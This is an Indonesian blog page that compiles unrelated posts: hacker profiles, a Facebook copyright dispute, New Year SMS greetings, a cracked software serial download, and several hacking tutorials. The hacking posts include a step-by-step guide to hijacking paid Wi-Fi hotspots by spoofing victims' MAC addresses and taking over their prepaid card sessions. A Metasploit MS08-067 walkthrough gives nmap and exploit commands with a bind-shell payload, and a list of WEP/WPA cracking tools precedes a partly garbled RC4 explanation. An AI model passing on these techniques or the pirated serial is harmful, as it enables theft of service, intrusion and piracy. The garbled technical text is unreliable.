Pages

Subscribe:

Text-Ads

Sabtu, 18 Februari 2012

3 hacker terbaik di indonesia

1. Dani Firmansyah A.K.A Xnuxer

Xnuxer(di dunia maya), nama panggilan Dani Firmansyah di dunia bawah tanah, di tangkap Satuan Cyber Crime Direktorat Reserse Khusus Kepolisian Daerah Metro Jaya pada tanggal 24 April 2004 sekitar pukul 17:20 di Jakarta.
Jumat 16 April, Xnuxer mencoba melakukan tes sistem sekuriti kpu.go.id melalui XSS (cross site scripting) dari IP 202.158.10.117, namun dilayar keluar message risk dengan level low (website KPU belum tembus atau rusak).
Sabtu 17 April 2004 pukul 03.12,42, Xnuxer mencoba lagi melakukan penetrasi ke server tnp.kpu.go.id dengan cara SQL Injection dan berhasil menembus IP tnp.kpu.go.id 203.130.201.134, serta berhasil meng-up date daftar nama partai pada pukul 11.23,16 sampai pukul 11.34,27. Teknik yang dipakai Xnuxer dalam meng-hack yakni melalui teknik spoofing (penyesatan). Xnuxer melakukan serangan dari IP 202.158.10.117, kemudian membuka IP Proxy Anonymous Thailand 208.147.1.1 sebelum msuk ke IP tnp.kpu.go.id 203.130.201.134, dan berhasil membuka tampilan nama 24 partai politik peserta pemilu.

Beruntung Xnuxer meng-hack situs KPU hanya karena ingin mengetes keamanan sistem keamanan server tnp.kpu.go.id, tanpa ada muatan politik. Di tambah, sifat Xnuxer yang sangat cooperatif, akhirnya Xnuxer hanya di bui beberapa bulan saja.

2. Onno W. Purbo A.K.A Kang Onno

Onno Widodo Purbo (lahir di Bandung 17 Agustus 1962; umur 45 tahun) adalah seorang tokoh (yang kemudian lebih dikenal sebagai pakar di bidang) teknologi informasi asal Indonesia. Ia memulai pendidikan akademis di ITB pada jurusan Teknik Elektro pada tahun 1981. Enam tahun kemudian ia lulus dengan predikat wisudawan terbaik, kemudian melanjutkan studi ke Kanada dengan beasiswa dari PAU-ME.
RT/RW-Net adalah salah satu dari sekian banyak gagasan yang dilontarkan. Ia juga aktif menulis dalam bidang teknologi informasi media, seminar, konferensi nasional maupun internasional. Percaya filosofy copyleft, banyak tulisannya dipublikasi secara gratis di internet.
Pejuang kemerdekaan frekuensi 2.4 GHz, VOIP-Rakyat, dan Antena Wifi dari kaleng.

3. I Made Wiryana A.K.A Pak Made

Cyber Paspampres nih, konon website dan server President SBY beliau yang pegang untuk maintenance dan keamanannya… (pernah digempur ampe DDos, namun dalam waktu itungan detik back-up server –ga tau dah back-up yang nomor berapa– langsung up).
Beliau juga pelopor perkembangan linux di indonesia bersama pak Rusmanto (redaktur Info Linux). menyelesaikan pendidikan di dua institusi pendidikan yaitu S1-Fisika Universitas Indonesia pada tahun 1991 dan S1-manajemen Informatika STIMIK Gunadarma tahun 1992 dan melanjutkan Magister di eidith cowan university Australia dan sejak tahun 2004 sampai sekarang sedang menyelesaikan program Doktoral di RVS Bielfield Jerman. Dan sekarang berdomisili di Jerman. Status pekerjaannya adalah Dosen Tetap universitas Gunadarma.

Sumber: http://www.mypepito.info/2009/11/3-tokoh-hacker-terbaik-di-indonesia.html

Jumat, 17 Februari 2012

Hati-Hati Membuat / Menggunakan Template Untuk Blog : Blogger Indonesia Disomasi Facebook

JNC - Seorang blogger Indonesia yang bernama Ainun Nazieb tersandung masalah dengan raksasa penguasa jejaring sosial Facebook. Perusahaan tersebut melayangkan surat tuntutan terhadap Nazieb. 

Apa masalahnya?
Surat tuntutan ini bermula ketika Nazieb membuat blog pribadi yang beralamat di nazieb.comdan membuat tema blog bernama 'Smells Like Facebook' yang mirip dengan tampilan Facebook versi pertama. Nazieb dituntut facebook sebesar 2 Milliar.
Berawal dari ke-iseng-an untuk membuat tema blog pribadi yang mirip tampilan Facebook, akhirnya ada beberapa teman yang meminta dia menyediakannya sebagai tema yang bisa dipakai oleh orang banyak karena dinilai menarik. 
"Jujur saya tidak berniat mencari keuntungan, karena saat itu saya hanya berniat share saja," tutur Nazieb, ketika dihubungi okezone, Kamis (17/11/2011).
Tema blog tersebut memang sudah distop untuk diunduh dari blog pribadinya, namun peredarannya belum tentu berhenti. Orang lain masih mungkin bisa melakukan share melalui blog mereka.
Duh....Blogger Indonesia Disomasi Facebook
Themes Yang mirip tampilan facebook.
Upaya yang sedang dilakukan Nazeib saat ini ialah berkonsultasi dengan kuasa hukumnya yang disediakan oleh pimpinan perusahaan di mana dia bekerja sekarang. Bersama kuasa hukumnya dia akan memenuhi panggilan pihak Facebook Indonesia pada hari Senin, 21 November atau Rabu, 23 November 2011.
Saat ini dia masih mengkonsultasikan masalah ini dengan kuasa hukum yang disediakan oleh pimpinan perusahaan tempat dia bekerja, kemudian dia dan kuasa hukumnya akan mendatangi panggilan perwakilan Facebook pada hari Senin atau Rabu mendatang, untuk mengetahui apa yang sebenarnya dituntut pihak Facebook.
Apa yang dilakukan Ainun Nazieb memang lebih dari sebuah kreatifitas biasa. Memanfaatkan ilmu untuk sebuah karya memang sangat diharapkan ada di setiap individu generasi penerus bangsa, namun sebaiknya memperhatikan juga karya orang lain. Jangan sampai menimbulkan masalah yang lebih besar karena masalah hak cipta.

Kiranya kejadian ini menjadi pelajaran bagi kita yang bergelut di dunia digital, khususnya sebagai blogger atau web desainer / developer. Karya orang wajib untuk dihargai. Kebiasaan buruk yang sering dilakukan beberapa blogger adalah menghapus credit / copyrigth yang biasanya terletak di footer setiap template. 

Sebagai sesama blogger, saya tetap memberikan dukungan kepada 
Ainun Nazieb, semoga masalah ini cepat selesai. Salam Blogger, Blogger Selalu Berhati Nyaman :)

JANGAN LUPA SHARE TULISAN INI UNTUK MEMBERIKAN SUPPORT KEPADA BLOGGER INDONESIA YANG DISOMASI FACEBOOK



Tulisan ini saya buat dengan mereferensi berita di plasa.msn.com
Description: Hati-Hati Membuat / Menggunakan Template Untuk Blog : Blogger Indonesia Disomasi Facebook Rating: 5 Reviewer: Jeanot Nahasan - ItemReviewed: Hati-Hati Membuat / Menggunakan Template Untuk Blog : Blogger Indonesia Disomasi Facebook


sumber : http://jeanotnahasan.blogspot.com/2011/11/hati-hati-membuat-menggunakan-template.html

Sabtu, 25 Desember 2010

BOBOL HOSPOT YANG DI PASSWORD

Selamat Membaca



ini bagi yang punya wireless deket rumah tapi di passwordin nah ini dia
Untuk tulisan ini ilmu belajar komputer bukannya mau memberikan saran yah, tapi hanya sebagai pelajaran aja yaitu Cara membobol hotspot warnet dan jaringan wireles internet yang dapat kamu tangkap keberadaannya OK.

Trik ini juga bisa digunkan untuk mencari pasword yang digunakan oleh seseorang dalam mengakses hotspot yang bisanya menggunakan kartu prepaid atau member dari suatu warnet Lho! perhatikan baik-baik ya!

Alat yang dipersiapkan sih simple aja :

- Seperangkat Laptop
: Pc yang kena wireless juga boleh, asal jaringan hotspotnya nyampek.

- Charger laptop
: karena pasti memakan banyak daya batre saat keranjingan internet gratisNgakakNgakak.

Software yang diperlukan :

1. AngryIP Scanner (108 kb): ini software untuk scanning ip dan mencari mac address korban. Softwarenya search aja di google kecil kok ukurannya. Tinggal pakai alias gak perlu instalasi.

2. Mac Addres Chager (312 kb): software ini dipergunkan untuk mengganti mac addres kita. Mac Address ? gak perlu dijelasin yang penting bisa makeknya, tak pasti ngeti sambil jalan. (asal jalan gak jauh-jauh “^_^”). Silakan search di google.

Langsung aja sekarang ke caranya :

1. Cari lokasi penyedia layanan hotspot, tentunya di daerah yang terjangkau jaringan hotspot tersebut.

2. Hidupkan laptop anda, dan hidupkan pula wireless network anda dan lihat di sistem tray icon wireless network, kemudian klik kanan dan pilih view avalible wireless network, dan tentunya setelah itu anda harus connect ke wireless hotspot tujuan anda.

3. Setelah connect, klik kanan sistem tray dan pilih status >pilih tab detail > kelihatan disana ip yang diberikan kepada kita. Catat ip tersebut.

4. Buka Program AngryIP Scanner dan isikan ip range yang akan kita scan (pakai data ip kita tadi) pada bagian atas. Misalnya : IP yang kita dapat xxx.xxx.x.xx kemuadian masukkan pada kolom range pertama ip kita sesuai dengan ip yang tadi namun ganti angka di bagian akhir dengan 1 menjadi xxx.xxx.x.1 dan pada kolom kedua tuliskan sama namun angka satu diakhir itu ganti dengan 255 menjadi xxx.xxx.x.255. hasilnya xxx.xxx.x.1 to xxx.xxx.x.255 dan klik start (tombol merah).

5. Setelah melakukan scanning maka kita akan mendapatkan data ip yang hidup yang terkoneksi dengan hotspot tersebut. setelah scanning selesai maka lihat ip yang hidup (alive host) warna biru klik kanan pada ip yang hidup Klik kanan pada ip yang warna biru tadi klik kanan > show > mac address dan akan ada kode mac addres (terkadang ada mac addressnya tidak tampil, pilih saja ip yang lainnya). Catat mac address yang kita dapatkan.

6. Buka Program Mac Address Changer yang telah kita persiapkan. Disana ada field mac address. nah sekarang tinggal ganti mac address tersebut dengan yang kita dapatkan tadi dan tekan change mac id.

7. Tunggu karena mac kita aan diganti dan koneksi sementara terputus dan konek lagi otomatis sendiri.

8. Masuk web browser firefox atau apa saja boleh. Nikmati Internet Gratis…

Satu hal yang perlu diingat adalah kita sistemnya numpang data transfer pada account yang kita hack tadi (yang punya ip tadi, maaf…). Kalau Saya sih biasanya untuk mengakalinya adalah dengan masuk halaman status login hotspot tersebut (untuk dapat account). misalnya idonbiu.hotspot.net/status dan begitu masuk disana kan terlihat nomor sandi prepaid card dan kita catat saja, lalu logout, dan masuk kembali ke halaman login hotspot itu cepat-cepat masukkan sandi tadi. Hal ini akan membuat kita secara langsung dapat mengakses internet tanpa menumpang lagi (soalnya yang make prepaid card code kan kita) jadi kalau ada yang mau login pakai kartu itu (yang punya code) saat kita login pakai kartu itu tentunya dia tidak akan bisa masuk karena kartu prepaid cardnya “already login”.

Bagaiamana, menarik bukan ?

Tapi saya sarankan, seperti yang saya lakukan adalah dengan menumpang saja, karena saya tidak mau berbuat terlalu jauh, seperti cara yang saya beritau untuk me log off dan log in lagi tentunya akan membuat sang pemilik tidak bisa log in. Kasian kan ?

Jadi mumpung sudah dikasi gratisan, kenapa gak numpang saja ya, itung-itung cuman ikutan ngakses bareng kan tidak terlalu merugikan. Minta ijin langsung juga kemungkinan yang punya gak nolak, asal kepentingannya memang mendesak.

Untuk Sacanning Ip saya juga bisa gunakan aplikasi the dude untuk mengetahui kondisi koneksi komputer-komputer ke hotspot. Bisa dicoba juga ya.

Sekali lagi, semua ini hanya untuk pembelajaran saja, selama kita masih mampu kenapa gak pakai yang legal aja. Dan ini juga bisa dimanfaatkan oleh pemilik hotspot, kalau cara ini masih bisa digunakan untuk membobol. Jadi perlu keamanan yang lebihTongueTop…

SMS UCAPAN TAHUN BARU 2011 LUCU DAN NGAKAK




Kumpulan sms tahun baru 2011terbaru lucu dan unik, semuanya bisa anda koleksi secara gratis. Contoh ucapan tahun baru ini khusus bagi anda yang akan ngerayain acara pergantian tahun nanti. Dengan berlalunya tahun 2010, semoga di tahun 2011 semua cita-cita dan harapan baru bisa tercapai, amiin.


Aku punya hadiah Tahun Baru istimewa buat kamu: segelas perawatan, sepiring cinta, perdamaian sendok, garpu mangkuk kepercayaan dan doa, met thn baru 2011 yah..

Today 31 December 2010,
Tomorrow 1 Januari 2011..
Days are so fast!
So, I wanna be the 1st 2 say,,
“Happy New Year 2011″..
May the peace and love of GOD,
fill each day of your life and,
light your way through the New Year 2011..

Minum kopi di cangkir
Cangkirnya berwarna putih
HEPI New YEaR
wahai kekasih hati

|””|__|””|.*.*.*.*.
| APPY.*.*.*
|__|””|__|.*.*.*.*
*.*.*.*.*.*.*.*.*.
*. NEW YEAR 2011 *
*.==.== .*

2 U & UR FAMILY
GOD BLESS

Jadilah lilin. Jadilah cahaya. Jadilah binar dalam gelap. Jadilah inspirasi & membuat perbedaan besar dalam hati lain,Selamat Thn Baru 2011.

(“),*,(“) (“),,(“)
“(,,’o',)” ”(‘_’,,)
/”"*”"\ /”"*”\
()”"”"() ()”"”"()

Happy New Year 2011

B-egin with
L-ove in CHRIST
E-xpect blessing
S-hare goodness
S-hine like the sun
l-nspire everybody
N-ever forget that
G-OD is with u always

Happy New Year 2011

Dengan berjalannya waktu, setiap pengalaman dalam hidup adalah pelajaran, tapi cinta & peduli akan selalu menjadi kekuatan dalam bertahan hidup. Slmt Thn Baru 2011.

Wishing u SUNLIGHT in u’r heart
SUCCESS in u’r path
ANSWERS to u’r prayers..
HAPPINESS in u’r life..
SMILE in u’r face..

Happy New Year 2011


Tahun ini ‘kan berlalu,
Laksana anak panah terlepas dari busurnya.
Fajar baru di tahun yang akan datang,
Semoga menjadi lembaran baru yang lebih baik.
Selamat tahun baru 2011
Semoga lebih maju dan sukses..

Jalan-jalan naik pedati
Menikmati pemandangan nan indah
Tidak terasa tahun kan berganti
Semoga saja tahun nan indah
Sukses selalu di tahun 2011 nanti!

FAITH makes all things possible,
HOPE makes all things work,
LOVE makes all things beautiful.
May you have all three in this New Year 2011

SMiLE-it makes U look nice!
PRAY-it makes U stronger!
GIVE-it makes U richer!
LOVE-it makes U know life!

Happy New Year 2011

Tet tret tet ... Selamat Tahun Baru .. Mengucapkan selamat tinggal pada 2010 dan menyambut ke tahun baru 2011 .. Semoga tuhan memberkati kita .. semoga tahun ini jauh lebih baik dari tahun lalu dan harapan bahwa kita selalu bisa menjadi teman yang baik .. Selamet Taun Baru 2011.

Sebelum operatot sibuk….sebelum sms pending mulu…sebelum low bat….Happy new year 2011….

Tahun baru? Gaya batu donk! eh,met tahun baru ya!

Toet….toet…toet….happy new year!….udah ya mo tiup trompet lagi….toet….toet….toet…..

Aye cuma mampir bentaran neh…mo bilang….met taon baru ye mpok….abang….

Tuhan murah hati selalu memberi. Pagi ini indah, seperti juga kemarin dan esok. Syukur kepada Allah!

Yesterday is memory. Today is a gift. Tommorow is a Hope. Let’s begin New Year 2011 with faith, love, peace and new hope. GBU

Tahun ini 'kan berlalu,
Laksana anak panah terlepas dari busurnya.
Fajar baru di tahun yang akan datang,
Semoga menjadi lembaran baru yang lebih baik.
Selamat tahun baru 2011
Semoga lebih maju dan sukses..

Happy New Year 2011. May this new year bring us a new spirit to reach all your dreams, good health and a happiness forever…

Happy New Year 2011, a new beginning for a better life. GBU ABUNDANTLY!

No regret about the past…
No fear about the future…
New hopes & dreams in 2011…
Thankful to God for His blessings in 2011…
Happy New Year !!

Only open HEARTS receive LOVE
only open MINDS receive WISDOM
only open HANDS receive GIFTS
and..
only SPECIAL FRIENDS receive my Happy New Year greeting .

Waktu untuk berbagi, waktu untuk mencintai, waktu untuk mengampuni, waktu untuk sukacita, waktu untuk menghibur, waktu untuk mengumpulkan, saatnya untuk mengucapkan Met Tahun Baru 2011.


Tahun Baru….
MOTIVASI & OBSESI BARU
PERBAHARUI LAGI TANAH AIR KITA INDONESIA MENJADI LEBIH BAIK!!!
Selamat Datang 2011…

Serpihan malam bulan separuh, jelang hari baru pertanda tiba. Kembang api membuncah ke angkasa sambut tahun muda 2011. Selamat tahun baru 2011 semoga lebih baik dibanding tahun sebelumnya.

Tiada kata yang seindah lantunan syair.
Tiada mutiara yang secantik bidadari.
Tapi hari ini melebihi dari hari sebelumnya, karena tak lama lagi kita akan melewati detik pergantian yang banyak di tunggu jutaan manusia di dunia.
Hanya satu yang dapat aku lakukan dan berkata
Selamat tahun baru 2011.

Waktu terus berlalu, lembaran demi lembaran telah dilalui. Coretan demi coretan telah memenuhi, kadang tak berarti, kadang tanpa makna, atau hanya sedikit makna. Semoga di tahun ini setiap lembaran memiliki makna, setiap lembaran bermanfaat. Selamat tahun baru 2011. Semoga lebih sukses.

Tahun ini hampir usai terlalui, belumlah tergores coretan berarti, belumlah setiap gagasan menjadi nyata, konsep masih terdokumenkan. Padahal telah berada dipenghujung, meski akan terlewati, semoga ada perubahan, dalam lembaran baru. Selamat tahun baru 2011 M.

Di sekolah di ajar bu Guru
Di pagar sekolah ada tukang bakwan
Mending ucap selamat tahun baru
Supaya bisa terus makan bakwan! (Maksa…hehehe…=)))

Matahari menyelinap dibalik bukit, sembunyikan kenangan hidup, menyimpan lembaran usang, menyambut hari-hari muda, sebentar lagi ‘kan menjelang. Selamat datang tahun baru 2011, harapan baru dan perubahan.

Masa lalu adalah sejarah, hari ini adalah goresan, hari esok adalah harapan. Selamat datang tahun baru 2011. Seiring dengan perginya kenangan, menyambut harapan. Selamat tinggal kenangan, selamat datang harapan.

Malam ini ‘kan berlalu, minggu ini ‘kan beranjak, bulan ini akan pergi, tahun ini ‘kan meninggalkan. Sejarah kehidupan, catatan suka dan duka, menyongsong tahun baru. Selamat tahun baru 2011. Semoga selalu jaya dan sejahtera.




Makan tomat bareng kangguru
Ada Ikan beku di peti es
SELAMAT TAHUN BARU!
Semoga selalu sukses

Senja indah, kirimkan ciprat keemasan, kirimkan pertanda keagungan, kekusaan, serta kemegahan. Meski itu hanya sekejap, hingga sirna ditepis malam, pertanda esok akan tiba. Selamat tahun baru 2011. Semoga sukses selalu.

Iman membuat segala sesuatu menjadi mungkin. Harapan membuat segala sesuatu menjadi bekerja. Cinta membuat segala sesuatu menjadi indah. Semoga kamu memiliki ketiganya untuk tahun baru ini, Selamat tahun baru 2011 ya.?

Iobit Game Booster 2.1 Full Serial

Perasaan baru kemarin saya share Game Booster 2.0, tapi kini Iobit Game Booster sudah update kembali, yakni menjadi Iobit Game Booster 2.1.

Iobit Game Booster premium merupakan aplikasi yang memang di rancang untuk dapat meningkatkan performa komputer kita dalam bermain game.Dengan menggunakan game booster sobat blogger tidak perlu setting ini itu untuk mendapatkan performa yang baik dalam bermain game. Sobat blogger hanya perlu klik, dan rasakan sendiri perbedaan nya.
Iobit Game Booster 2.1
Benefits keys :
  • Game Booster gives more CPU and RAM so that will make games run at maximum performance
  • Game Booster can do defragments files games with the aim to create a load games to run faster
  • Improve stability gaming
  • Not to change the Windows registry and system settings
Iobit Game Booster 2.1Requirement :
Operating Systems Supported
  • Microsoft® Windows® 7 (32-bit and 64-bit) Starter/ Home Basic/Home Premium/Professional/Ultimate
  • Microsoft® Windows® Vista (32-bit and 64-bit) Starter/Home Basic/Home Premium/Business /Ultimate
  • Microsoft® Windows® XP (32-bit and 64-bit) with SP2/SP3 or Home/Professional/Media Center
  • Microsoft® Windows® 2000
Hardware Requirements
  • 300 MHz processor or faster processor
  • 256 MB of RAM
  • 30 MB of free hard disk space
INFO : Serial 100% worked..!! Masukan serial dalam kondisi offline.


Password : www.remo-xp.com

Hacking Ala n00b gunain Metasploit 3

Ternyata hacking itu bisa jadi gampang banget kalau kita menggunakan tool yang bagus seperti Metasploit dan menemukan target yang rentan untuk dijadikan sasaran hacking. Cukup denga menginstall Metasploit Framework, mengetikkan kata kunci “metasploit tutorial” di Google, mencari target menggunakan nmap, menjalankan exploit di Metasploit, maka kita sudah dapat menguasai sistem operasi target (kalau beruntung ;-) ). Kalau dihitung, kita hanya mengetikkan beberapa perintah saja dari terminal untuk menguasai target (tentu saja targetnya harus vulnerable). Nah, di artikel ini saya akan mencoba menuliskan secara singkat bagaimana menggunakan Metasploit untuk mengekploitasi bug di service NetBIOS Windows XP SP2 . Kalau merasa masih n00b seperti saya, lanjutkan membaca tapi kalau sudah terbiasa dengan msf silakan ambil langkah seribu.
Skenario dan Kebutuhan Software
Di artikel ini, saya menggunakan dua PC untuk melakukan simulasi hacking kecil-kecilan. Sistem operasi yang digunakan hacker (biar keren jeh :D ) adalah Ubuntu 10.04, sedangkan target menggunakan Windows XP SP2. Kedua PC ini berada di jaringan dengan subnet yang sama, yaitu 10.10.10.128/25 di mana si hacker menggunakan IP 10.10.10.232/25 dan IP target 10.10.10.251/25. Di Ubuntu yang digunakan si hacker sudah terinstall nmap dan msf aka Metasploit Framework versi 3.4.2-dev. nmap dapat diinstall dari repo menggunakan package manager milik Ubuntu, sedangkan msf harus diinstall secara manual menggunakan petunjuk di sini.
Scanning Target
Walaupun sebenarnya kita sudah tahu bahwa sistem operasi target adalah Windows XP SP2 yang menjalankan service NetBIOS, namun dalam skenario ini kita akan berpura-pura tidak tahu. Oleh karena itu kita akan melakukan scanning menggunakan nmap untuk melihat apakah target bisa dieksploitasi. Dari PC hacker yang menggunakan Ubuntu Lucid Lynx, buka aplikasi terminal lalu jalankan nmap dengan mengetik:
1nmap -A -T4 10.10.10.251
Kalau hasilnya lebih kurang seperti gambar di bawah (ada port 445 yang open), maka kita dapat mencoba mengekploitasi target menggunakan msf.
undefined
Hasil scanning nmap
Exploit The Target
Kita boleh tersenyum karena target kelihatannya vulnerable. Sekarang waktunya menjalankan Metasploit, kembali ke terminal:
1msfconsole
Di awal, kita akan melihat tampilan seperti ini
Console milik metasploit
Dari prompt tersebutlah kita akan menjalankan perintah-perintah Metasploit untuk mengekploitasi target. Untuk skenario ini, jalankan perintah:
1use windows/smb/ms08_067_netapi
2set RHOST 10.10.10.251
3set PAYLOAD generic/shell_bind_tcp
Memulai eksploitasi
Perintah pertama digunakan untuk memilih bug yang akan kita ekploitasi, perintah kedua digunakan untuk menentukan IP dari target, dan perintah ketiga digunakan untuk memilih payload (payload itu merupakan aksi yang akan dijalankan jika bug berhasil dieksploitasi, dalam skenario ini kita meminta shell dari target aka command prompt).
Lalu jalankan exploit:
Jika berhasil tampilannya seperti ini:
undefined
Ekploitasi berhasil
Perhatikan ciri-ciri dari command prompt sistem operasi Windows, artinya kita sudah masuk di sistem target. Selanjutnya? Terserah anda.

Jumat, 24 Desember 2010

CARA ngeHACK WIRELES

Binus Hacker Sponsor Banner



WIRELESS HACKING TOOL

NetStumbler
Netstumbler yang dikenal sebagai Jaringan Stumbleris suatu alat acilitates detecting dari Wireless Lans menggunakan Wireless 802.11b, 802.11a dan 802.11g WLAN standar yang berjalan pada sistem operasi dari microsoft Win98 – Win Vista, ada versi lain juga yang disebut Anothere Mini Stumbler yang menggunakan sistem operasi Windows CE. Untuk alat” kecil yang bisa di genggam.
Anda bisa mendapatkannya disini
Aircrack
Tercepat untuk WEP / WPA cracking tool
Aircrack adalah suite alat untuk 802.11a/b/g WEP dan WPA cracking. Hal ini dapat dilakukan dalam 40 sampai 512-bit password WEP dan hanya sekali dienkripsi paket” telah dikumpulkan. Aircrack juga dapat menyerang WPA 1 atau 2 jaringan dengan menggunakan metode lanjutan cryptographic kasar atau memaksa. Suite yang mencakup airodump (802,11 sebuah paket pengambil program), aireplay (802,11 sebuah paket suntikan program), aircrack (statis WEP dan WPA-PSK cracking), dan airdecap (decrypts WEP / WPA untuk pengambil file).
Anda dapat memperoleh Aircrack disini
Airsnort
802,11 WEP Encryption Cracking Tool
AirSnort adalah LAN nirkabel (WLAN) tool yang digunakan untuk merecover enkripsi password. Ia dikembangkan oleh shmoo kelompok pasif dan dioperasikan oleh pemantauan transmisi, komputasi enkripsi password akan dilakukan bila paket telah dikumpulkan. Anda mungkin juga akan tertarik dengan Airsnort ini.
Anda dapat memperoleh AirSnort disini
Cowpatty
Cowpatty ini adalah tools yang baik untuk memaksa cracking WPA-PSK, yang dianggap “WEP Baru” untuk Home Wireless Security. Program ini hanya mencoba a bunch dari berbagai pilihan dari kamus file untuk melihat dan menemukan apa yang didefinisikan sebagai Pre-Shared Key.
Anda dapat memperoleh Cowpatty disini
Asleap
Alat ini sangat bagus ketika menggunakan jaringan Leap. Alat ini dapat digunakan untuk mengumpulkan data otentikasi yang sedang lewat di jaringan, dan ini dapat di sniffed sehingga bisa di crack. Leap tidak melindungi otentikasi lainnya seperti “real” EAP, yang merupakan alasan utama mengapa Leap dapat mudah rusak.
Anda dapat memperoleh Leap disini
Ethereal
Ethereal digunakan oleh seluruh dunia Wind0s oleh kedua sistem operasi dan opensource, yang digunakan untuk mengatasi masalah, analisis, dan perangkat lunak protokol pembangunan, dan pendidikan. Memiliki semua fitur-fitur standar yang akan diharapkan dalam analisa protokol, dan beberapa fitur tidak dilihat pada setiap produk. Lisensi open source memungkinkan penambahan perangkat tambahan bagi anda” yang memiliki keahlian. Bagus loh.. Coba deh :D
Anda dapat men-download Ethereal disini
Yang lainnya:
undefined
AiO Wireless Hack Tools 2009:

• NetStumbler 0.4.0
• Kismet 2005 08 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• Airsnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4 Information File:
Name: AIO Wireless Hack Tools 2009 Full
Size: 8,1 MB (recovery register 1%)
Language: English
Support Platform: Linux, Windows.
Format: RAR
Downloadfile :
WIRELESS HACKING TUTORIAL
WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WEP karena keamanan yang lemah, repot, atau WEP sangat pointless, karena bisa dicrack, walaupun biasanya memakan waktu cukup lama untuk memperoleh cukup data untuk mendapatkan password WEP, terutama password yang sangat panjang.
WEP terdiri dari password rahasia dan enkripsi. Password rahasia yang digunakan bersama antara akses point dan semua orang di jaringan nirkabel, terdiri dari 5 atau 13 karakter. Digunakan oleh proses enkripsi untuk komunikasi paket yang disamarkan sepanjang WLAN, atau Wireless Local Area Network. Semua paket yang unik dan acak, jadi jika seseorang melakukan crack pada satu paket key, mereka tidak dapat melihat apa yang dilakukan orang lain tanpa melakukan cracking pada mereka juga.
Ini semua dilakukan dengan menggunakan password rahasia bersamaan dengan tiga karakter (the Initialization Vector, atau IV) yang dipilih secara acak oleh perangkat nirkabel. Misalnya, jika Anda adalah password “hello”, mungkin membuat “abchello” untuk satu paket, dan “xyzhello” untuk lainnya.
WEP juga menggunakan XOR, atau Eksklusif ATAU, untuk enkripsi. XOR membandingkan dua bit, dan jika theyre berbeda, ia akan mengembalikan 1. Jika tidak, ia akan mengembalikan 0. Misalnya, 1 XOR 1 akan 0, dan 1 XOR 0 akan 1.
Array adalah variabel yang dapat menyimpan beberapa nilai. Misalnya, array abjad [26] akan terus nilai 26, yang diberi label 0 melalui 25.
Contoh:
alphabet[0] = ‘A’;
alphabet[1] = ‘B’;
void swap(char &first, char &second)
{
char temp = first;
first = second;
second = temp;
}
swap(alphabet[0], alphabet[1]);
Jika nilai-nilai array swapped randomely telah berkali-kali, maka tidak mungkin dikirim ke array elemen yang memegang nilai.
Algoritma yang sebenarnya digunakan oleh WEP untuk mengenkripsi paket yang adalah RC4. RC4 terdiri dari dua langkah: dengan password dan Penjadwalan Algoritma Pseudo Random Generasi Algoritma. Bagian pertama, yang Penjadwalan Algoritma password, atau KSA, seperti ini dalam kode C, assuming k [] adalah array dari password rahasia:
int n = 256;
char s[n];
// initialization
for (int i = 0; i <= (n – 1); i++)
s[i] = i;
int j = 0;
// scrambling
for (int l = 0; l <= (n – 1); l++)
{
j += s[l] + k[l];
swap(s[l], s[j]);
}
Mari kita telaah kode di atas hingga kita tahu bahwa:
1. Integer ‘n’ menentukan seberapa kuay enkripsi yang kita buat. WEP disini menggunakan 256.
2. Array karakter ‘k’ adalah password rahasia yang dikombinasikan dengan tiga karakter palsu. Hal ini tidak berubah sama sekali dalam program ini.
3. Tanda ’//Inisialisasi’ hanya merupakan inisialisasi, sebanyak karakter 0-255.
4. Integer ‘j’ digunakan untuk memegang nilai selama scrambling. Selalu diinisialisasi ke 0, karena harus selalu di mulai 0.
5. Selanjutnya, (di mana ‘/ / scrambling’) scrambling proses dimulai. Pada dasarnya akan menghasilkan ‘s’ array “acak” dari sebelumnya ‘ s’ array yang ditentukan.
6. Di dalam lingkaran, yang pertama mereka merges password (k) dengan acak array (s) untuk membuat sebuah karakter selesai. Lalu, panggilan untuk swap () menempatkan ke dalam array dari karakter selesai.
Sekarang saatnya untuk bagian kedua dari algoritma RC4, maka Algoritma Pseudo Random Generation (PRGA). Bagian ini output streaming password berdasarkan KSA’s pseudo-acak array. Streaming key ini akan digabung dengan data cleartext untuk menciptakan data yang dienkripsi.
int i = 0;
int j = 0;
int z;
while (data_disini)
{
i++;
j += s[i];
swap(s[i], s[j]);
z = s[s[i] + s[j]];
// z is outputted here
// and then XOR’d with cleartext
}
1. Integers’ i ‘dan’ j ‘telah dideklarasikan dan diinisialisasi ke 0.
2. Terdapat satu lingkaran yang berjalan sampai akhir paket data tersebut tercapai.
3. ‘I’ adalah incremented dalam setiap perulangan dari lingkaran itu agar tetap berjalan.
4. ‘J’ memegang pseudo-nomor acak.
5. Pemanggil lain untuk swap () karakter yang aktif dalam s [i], dan s [j].
6. ‘Z’ dihitung dengan menambahkan s [i], dan s [j] dan mengambil nilai dalam elemen sesuai jumlah mereka. Alasan ini akan dijelaskan nanti.
7. ‘Z’ adalah XOR’d dengan cleartext untuk membuat teks baru dienkripsi.
Berhubung dgn putaran CRC stands for redundancy checksum. Ketika paket-paket yang dikirim ke seluruh jaringan, harus ada cara untuk mengetahui host menerima paket belum rusak dengan cara apapun. Ini adalah tujuan dari CRC. Sebelum data dikirim, CRC menghitung nilai, atau checksum, untuk paket yang akan dikirim dengan paket. Bila diterima, target host menghitung baru dari checksum menggunakan CRC. CRCs Jika cocok, maka paket dari kredibilitas telah dikonfirmasi.
Ringkasnya. Access Point menciptakan pseudo-acak karakter. Mereka bergabung dengan berbagi prechosen password untuk membuat password rahasia. KSA kemudian menggunakan password ini untuk membuat pseudo-acak array, yang digunakan oleh PRGA streaming untuk membuat key. Password ini kemudian di XOR dengan cleartext untuk menciptakan data dienkripsi, dan masuk ke dalam CRC dan membuat checksumnya.
Kemudian, untuk penerimaan host decrypts. Karakter ditambahkan oleh AP yang akan dihapus dan digabung dengan key untuk dikirim kembali bersama dengan password rahasia. Password masuk melalui seluruh proses RC4, dan XOR’d dengan teks terenkripsi, dan menciptakan cleartext checksum. Checksum akan dihapus dan dibuat yang kemudian dibandingkan untuk melihat apakah data selamat, dan apakah ini merupakan pengguna asli.
Bagian II: Cracking WEP
Sebelum kita masuk cracking WEP, mari kita bahas beberapa flaws dalam proses enkripsi:
* Ada 5% kesempatan bahwa nilai dalam s [0]-s [3] tidak akan berubah setelah tiga Iterasi oleh KSA.
